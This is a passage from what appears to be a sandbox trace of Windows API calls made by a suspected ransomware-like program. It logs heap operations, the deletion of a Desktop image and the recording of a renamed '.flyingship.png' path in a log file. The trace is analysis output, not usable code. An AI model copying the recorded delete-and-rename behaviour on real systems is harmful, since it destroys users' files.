hHeap=0x650000) returned 1 [0075.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.189] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0075.189] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0075.189] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0075.189] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0075.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0075.189] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0075.189] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0075.189] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0075.189] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0075.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0075.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.189] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0075.189] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0075.189] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e630 [0075.189] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0075.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0075.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0075.189] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0075.189] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e630 [0075.189] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0075.189] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0075.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0075.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.189] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0075.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e630 [0075.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0075.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0075.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0075.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0075.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0075.190] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4f8 | out: hHeap=0x650000) returned 1 [0075.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0075.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfb8 | out: hHeap=0x650000) returned 1 [0075.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0075.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0075.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0075.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0075.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0075.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0075.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0075.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.190] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb648 [0075.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a4ff0 [0075.190] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5e8 [0075.190] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb648 [0075.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.191] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb648 [0075.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.191] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0075.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0075.191] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0075.191] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dec8 [0075.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0075.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0075.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e660 [0075.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e678 [0075.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0075.191] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0075.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908b0 [0075.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0075.191] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0075.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0075.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e3a8 [0075.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x76e3a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0075.193] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.193] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0075.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a4ff0 [0075.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0075.193] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0075.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0075.193] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0075.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e060 [0075.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0075.193] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0075.193] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png", nBufferLength=0x7fff, lpBuffer=0x60ea80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png", lpFilePart=0x0) returned 0x40 [0075.194] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png", lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5eb2fb80, ftCreationTime.dwHighDateTime=0x1d5e34e, ftLastAccessTime.dwLowDateTime=0x2454b2e0, ftLastAccessTime.dwHighDateTime=0x1d5e10e, ftLastWriteTime.dwLowDateTime=0xc996f8a0, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x44c1, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="bqTv.png", cAlternateFileName="")) returned 0x6b8b38 [0075.194] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\bqtv.png")) returned 1 [0075.196] FindNextFileW (in: hFindFile=0x6b8b38, lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5eb2fb80, ftCreationTime.dwHighDateTime=0x1d5e34e, ftLastAccessTime.dwLowDateTime=0x2454b2e0, ftLastAccessTime.dwHighDateTime=0x1d5e10e, ftLastWriteTime.dwLowDateTime=0xc996f8a0, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x44c1, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="bqTv.png", cAlternateFileName="")) returned 0 [0075.196] FindClose (in: hFindFile=0x6b8b38 | out: hFindFile=0x6b8b38) returned 1 [0075.197] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.197] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.197] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0075.197] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.198] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0075.198] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.198] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.198] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.198] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0075.198] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0075.198] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.199] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eedc | out: lpNewFilePointer=0x0) returned 1 [0075.199] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.199] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0075.199] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.199] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eecc | out: lpNewFilePointer=0x0) returned 1 [0075.200] ReadFile (in: hFile=0x128, lpBuffer=0x795ff8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x795ff8*, lpNumberOfBytesRead=0x61eef4*=0x9f, lpOverlapped=0x0) returned 1 [0075.200] ReadFile (in: hFile=0x128, lpBuffer=0x795ff8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x795ff8*, lpNumberOfBytesRead=0x61eef4*=0x0, lpOverlapped=0x0) returned 1 [0075.200] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x9f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.200] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0075.200] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.200] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0075.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\r\n", cchWideChar=78, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 78 [0075.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\r\n", cchWideChar=78, lpMultiByteStr=0x6d3530, cbMultiByte=78, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\r\n", lpUsedDefaultChar=0x0) returned 78 [0075.201] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0075.201] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d3530 | out: hHeap=0x650000) returned 1 [0075.201] WriteFile (in: hFile=0x128, lpBuffer=0x6d34d8*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x6d34d8*, lpNumberOfBytesWritten=0x61eef4*=0x4d, lpOverlapped=0x0) returned 1 [0075.201] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d34d8 | out: hHeap=0x650000) returned 1 [0075.201] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.201] CloseHandle (hObject=0x128) returned 1 [0075.203] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0075.203] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.203] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x795ff8 | out: hHeap=0x650000) returned 1 [0075.204] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b38 | out: hHeap=0x650000) returned 1 [0075.204] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0075.204] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.204] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0075.204] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0075.204] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a0b20 | out: hHeap=0x650000) returned 1 [0075.204] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.204] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0075.204] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0075.204] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9c8 | out: hHeap=0x650000) returned 1 [0075.204] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.204] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89b8 | out: hHeap=0x650000) returned 1 [0075.204] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.204] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b540 | out: hHeap=0x650000) returned 1 [0075.204] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0075.204] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d630 | out: hHeap=0x650000) returned 1 [0075.204] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.204] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d068 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x698600 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d838 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6a8 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d680 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690740 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d7c0 | out: hHeap=0x650000) returned 1 [0075.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0075.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad78 | out: hHeap=0x650000) returned 1 [0075.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0075.206] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8978 | out: hHeap=0x650000) returned 1 [0075.206] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.206] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.206] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0075.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0075.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0075.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0075.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.206] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.206] HeapFree (in: hHeap=0x650000, dwFlags=0x0, 